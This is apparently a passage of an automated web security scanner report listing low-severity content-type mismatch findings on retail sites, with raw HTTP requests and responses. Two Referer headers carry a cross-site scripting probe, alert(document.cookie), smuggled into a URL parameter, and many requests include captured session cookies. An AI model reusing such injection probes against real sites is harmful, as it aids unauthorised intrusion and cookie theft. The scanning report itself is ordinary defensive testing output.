The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=1402662 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510908159; ASPSESSIONIDSQBBBCQB=AJBFJLFBKKLLCEBDLJEAJLLC

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=1402662
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1483"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:03:02 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

26.28. https://secure.bhphotovideo.com/images/!crd_prm!.!cm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://secure.bhphotovideo.com
Path:	/images/!crd_prm!.!cm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a BMP image.

Request

GET /images/!crd_prm!.!cm?crd_ver=0.9.5&crd_rnd=569969&crd_cnt=0.01&crd_tpb=1305541063955&crd_olt=0 HTTP/1.1
Host: secure.bhphotovideo.com
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/tryagainlater.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; JSESSIONID=pfTcNQ5SFQ!-112699937; TS20403f=8a761c2c8821a78158429f233f763ae4122d42923efb3af94dd0f9c1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Thu, 17 Feb 2011 03:58:49 GMT
ETag: "42-4d5c9cf9"
Accept-Ranges: bytes
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:17:46 GMT
Connection: keep-alive
Content-Length: 66

BMB.......>...(...................................................

26.29. https://secure.orientaltrading.com/uiframework/skins/default/js/shoppingCart.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://secure.orientaltrading.com
Path:	/uiframework/skins/default/js/shoppingCart.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.30. http://shop.pacsun.com/js/widget-qv-uc.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://shop.pacsun.com
Path:	/js/widget-qv-uc.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/widget-qv-uc.jsp HTTP/1.1
Host: shop.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4A5CD2AB14DCF8A7583336761C49C5F9; PIPELINE_SESSION_ID=f678eccdc0a8116800f19d6e8f776319; stop_mobi=yes; Country=US; Currency=USD; mbox=check#true#1305510282|session#1305510221453-787352#1305512082; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Cache-Control: max-age=1
Date: Mon, 16 May 2011 01:54:21 GMT
Connection: close
Content-Length: 6093

/* QuickView Javascript */
/* ---------------------------------------- */

//quickViewcommands[0] = "show" action
//quickViewcommands[1] = "add product" action
var quickViewCommands = new Array(2);

...[SNIP]...

26.31. http://sr2.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sr2.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=53965383 HTTP/1.1
Host: sr2.liveperson.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: LivePersonID=LP i=16601155425835,d=1302186497

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=53965383
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:2313"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:41:47 GMT
Connection: close
Content-Length: 17291

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

26.32. https://subscriptions.marvel.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://subscriptions.marvel.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

26.33. http://trvlgrd.netmng.com/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://trvlgrd.netmng.com
Path:	/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.34. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=LikeDetail&app_id=LikeDetail&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3c2f0030%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df164f97d0%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42e6f9a4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3e52e016%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42e6f9a4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1e4c4f9bc%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42e6f9a4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df346e6536%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42e6f9a4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.29.25
X-Cnection: close
Date: Mon, 16 May 2011 01:58:45 GMT
Content-Length: 22

Invalid Application ID

26.35. http://www.footlocker.com/images/common/coradiant/!crd_prm!.!cm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.footlocker.com
Path:	/images/common/coradiant/!crd_prm!.!cm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a BMP image.

Request

GET /images/common/coradiant/!crd_prm!.!cm?crd_ver=0.9.5&crd_rnd=106884&crd_cnt=0.01&crd_tpb=1305510862694&crd_olt=18656 HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; SSLC=web07; USER_PROFILE=HSPEqM4qU3DrFgRRbE4xA41L%2FxlKfNqQFH82vg1uFDf78j9GgBKSVG72ux9P9BBD9TNotE%2FuTdY7%0ApgsOVdTPmuf5mHGkQdt%2Fp4QG7ekqXGW%2Bc0%2BRT5CrpIV02E6hdSX61Dc5kPpRmjrov7on6s6li5HE%0AlOQG5YDlPEHH39sa1pRrpC3F25gGPN%2B9AXbwHEZb7MdHE8MV1vwxbOmvVo1eIzUeLfk1WM7eU85U%0AI9k9nJhUP8QjAazzjzcfG7j8i%2FZcdDc6rIzc9KtfsknfcwMpBJgyU6MmKYeBzKCHNiF4nGiiNSnF%0AcO5qGOI%2F1ENBjQbjXaghymu5WCtRYmAA%2FyLJM6SorvFGpkVfhe2sQZVzu3Kglt%2BFhTm8qRZenVT4%0AVbKkKIGY%2BpNyEWDhq79vMwb2kdMXujxgmwUz; BROWSER_SESSION=ralquAXUBpcSoNO65%2FZbRPD%2FAJ%2F1qkUwimcu38BTWxf6OLJJhPFUS2qHovA0PKYQ68EfgqxTfvoM%0ANZstUyOpfmuQYhPsaDqR; TID=5555%2D37151120432137200525561%2D0; cmTPSet=Y; fcspersistslider_click_1=1; mbcs=FF749AA3-A7E6-5BAF-08D2-2754D53C08DB

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 09 Oct 2009 19:18:06 GMT
Accept-Ranges: bytes
Content-Length: 66
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/plain
Date: Mon, 16 May 2011 02:01:06 GMT
Connection: close

BMB.......>...(...................................................

26.36. http://www.footlocker.com/ns/hp/css/images/FL_Collections_arrow_l.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.footlocker.com
Path:	/ns/hp/css/images/FL_Collections_arrow_l.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /ns/hp/css/images/FL_Collections_arrow_l.gif HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; SSLC=web07; USER_PROFILE=HSPEqM4qU3DrFgRRbE4xA41L%2FxlKfNqQFH82vg1uFDf78j9GgBKSVG72ux9P9BBD9TNotE%2FuTdY7%0ApgsOVdTPmuf5mHGkQdt%2Fp4QG7ekqXGW%2Bc0%2BRT5CrpIV02E6hdSX61Dc5kPpRmjrov7on6s6li5HE%0AlOQG5YDlPEHH39sa1pRrpC3F25gGPN%2B9AXbwHEZb7MdHE8MV1vwxbOmvVo1eIzUeLfk1WM7eU85U%0AI9k9nJhUP8QjAazzjzcfG7j8i%2FZcdDc6rIzc9KtfsknfcwMpBJgyU6MmKYeBzKCHNiF4nGiiNSnF%0AcO5qGOI%2F1ENBjQbjXaghymu5WCtRYmAA%2FyLJM6SorvFGpkVfhe2sQZVzu3Kglt%2BFhTm8qRZenVT4%0AVbKkKIGY%2BpNyEWDhq79vMwb2kdMXujxgmwUz; BROWSER_SESSION=ralquAXUBpcSoNO65%2FZbRPD%2FAJ%2F1qkUwimcu38BTWxf6OLJJhPFUS2qHovA0PKYQ68EfgqxTfvoM%0ANZstUyOpfmuQYhPsaDqR; TID=5555%2D37151120432137200525561%2D0; cmTPSet=Y; fcspersistslider_click_1=1; mbcs=FF749AA3-A7E6-5BAF-08D2-2754D53C08DB

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 15
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:54:40 GMT
Connection: close

File not found.

26.37. https://www.footlocker.com/images/common/coradiant/!crd_prm!.!cm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.footlocker.com
Path:	/images/common/coradiant/!crd_prm!.!cm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a BMP image.

Request

Response

26.38. http://www.linkedin.com/companyInsider previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.linkedin.com
Path:	/companyInsider

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.39. https://www.orderhouse.com/Navigation/DisplayImage.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.orderhouse.com
Path:	/Navigation/DisplayImage.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /Navigation/DisplayImage.aspx?ExtranetId=4&Type=Style_Logo HTTP/1.1
Host: www.orderhouse.com
Connection: keep-alive
Referer: https://www.orderhouse.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=234tuue5qomlrz2hyz2htr55; AccountType=; Pref=0; InitialEventId=24102329

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/jpeg
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:39:32 GMT
Content-Length: 3247

GIF89a..3..?.xxx......................mjCCC................TQTTT...&&&eee.......;9..............................999.............xv....&$..........QN....OL.HE...................a^.?=.........31.......
...[SNIP]...

26.40. http://www.petco.com/Handlers/Navigation/MegaMenuHandler.ashx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.petco.com
Path:	/Handlers/Navigation/MegaMenuHandler.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /Handlers/Navigation/MegaMenuHandler.ashx?a=getall&d=Sun%20May%2015%202011%2020:54:03%20GMT-0500%20(Central%20Daylight%20Time) HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D1%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D243%3Bgid%3Df47055609695b3445280ada1f0e6c4c5%3Bgdx%3D89%3Bpt%3D61781%3B; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; SL_UVId=28F6BEFE806000C3; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D1%3Bnsid%3D1%3Blut%3D1305510840147%3B; CoreAt=90002311=1|2|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&

Response

HTTP/1.1 200 OK
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Location: http://www.petco.com:80/handlers/navigation/megamenuhandler.ashx?a=getall&d=sun%20may%2015%202011%2020:54:03%20gmt-0500%20(central%20daylight%20time)
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: ViewState,Compression
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:05 GMT
Connection: close
Set-Cookie: sltest=T; path=/; domain=petco.com.
Content-Length: 33122

[{"Content":"<div class=\"menu-col first\"><a href=\"http:\/\/www.petco.com\/N_22_149\/Dog-Apparel.aspx?Ns=P_DateCreated|1&CoreCat=MM_DogSupplies_Apparel\">Apparel<\/a><a href=\"http:\/\/www.petco.com
...[SNIP]...

26.41. http://www.res-x.com/ws/r2/Resonance.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.res-x.com
Path:	/ws/r2/Resonance.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ws/r2/Resonance.aspx?appid=HomeDepotCA01&tk=989860238041728&ss=223896591225639&sg=1&pg=307165416656062&bx=false&vr=2.69&ur=http%3A//www.homedepot.ca/webapp/wcs/stores/servlet/Home%3FstoreId%3D10051%26catalogId%3D10051%26langId%3D-15&plk=941965;921564;916034;940192;913068;900701;939123;938337;941444;943490;943548;943555;918895;914139;918498;924989;&rf= HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=l0c4ty55mvnbbsewkm3fevbt; NSC_wjq-Rvbsboujof2=ffffffffc3a01e2f45525d5f4f58455e445a4a423660; NSC_wjq-Hspvq4=ffffffffc3a01e5345525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI"
Date: Mon, 16 May 2011 01:53:43 GMT
Content-Length: 10

26.42. http://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.restorationhardware.com
Path:	/sitewide/includes/footer/email-sign-up.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /sitewide/includes/footer/email-sign-up.jsp HTTP/1.1
Host: www.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=b6e810b3b0486de55c7dc77610c783822efa223a5124b4964dd08831; fsr.s={"v":1,"rid":"1305509997099_983249","pv":1,"to":3,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510793290}; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.2.10.1305509985; engagement=2; fsr.a=1305510805730

Response

26.43. https://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.restorationhardware.com
Path:	/sitewide/includes/footer/email-sign-up.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

26.44. http://www.siteadvisor.com/images/logo.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.siteadvisor.com
Path:	/images/logo.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/logo.gif HTTP/1.1
Host: www.siteadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.siteadvisor.com/download/windows.html?cid=64895
Cache-Control: max-age=0
If-Modified-Since: Tue, 29 Mar 2011 13:51:01 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "609d3e-984-49f9f59bcbb40"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_campaign=64895; s_nr=1305509542874-Repeat; s_sq=%5B%5BB%5D%5D; cid=64895

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:46 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 13:51:01 GMT
ETag: "51e03-984-49f9f59bcbb40"
Accept-Ranges: bytes
Content-Length: 2436
Content-Type: image/gif

.PNG
.
...IHDR................N....sRGB.........gAMA......a.....PLTE..0..=. J.0W.@d.Pq.`~.p..........................................................................................................
...[SNIP]...

26.45. http://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.toshibadirect.com
Path:	/js/coremetrics/emptyfunctions.inc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /js/coremetrics/emptyfunctions.inc HTTP/1.1
Host: www.toshibadirect.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1730020066.1305542428@@@@

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:41:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Last-Modified: Tue, 24 Nov 2009 23:13:36 GMT
Accept-Ranges: bytes
Content-Length: 1064
Content-Type: text/plain

<!--
function callCMEventTag(){}
function cmCreateConversionEventTag(){}
function cmCreateCouponOrderTag(){}
function cmCreateCouponTag(){}
function cmCreateDefaultPageviewTag(){}
function cmCreateErr
...[SNIP]...

26.46. http://www.toshibadirect.com/td/b2c/headerAjax.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.toshibadirect.com
Path:	/td/b2c/headerAjax.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /td/b2c/headerAjax.jsp?ts=1305510824386 HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:1&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20s_invisit%3Dtrue%7C1305511850353%3B%20omtr_lv%3D1305510050391%7C1400118050391%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305511850391%3B%20s_nr%3D1305510050395%7C1308102050395%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305511850405%3B; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
